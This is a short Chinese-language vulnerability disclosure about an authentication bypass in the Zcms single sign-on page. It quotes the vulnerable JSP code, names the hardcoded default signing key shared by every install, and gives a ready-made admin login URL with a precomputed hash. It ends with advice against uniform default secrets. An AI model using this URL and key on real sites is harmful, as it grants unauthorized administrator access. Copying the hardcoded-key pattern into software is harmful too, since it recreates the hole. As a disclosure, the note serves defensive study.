认证绕过：Zcms单点登录认证缺陷 <%@page import="com.zving.platform.Login"%> <%@page import="com.zving.framework.utility.StringUtil"%> <% String username = request.getParameter("u"); String time = request.getParameter("t"); String str = request.getParameter("s"); String key = "WIU%&*DJAJKL%^*W(DLJIST"; String s = StringUtil.md5Hex(username + time + key); if (s.equals(str)) { Login.ssoLogin(request, response, username); } %> // key安装后缺省都是“WIU%&*DJAJKL%^*W(DLJIST”，可以计算出s登录后台 //SSO.jsp?u=admin&t=2010/1/11&s=f7edb87197b4437df8651ae320623006 提示：所有发布版不能用统一的缺省值来完成某些必须要执行的信息。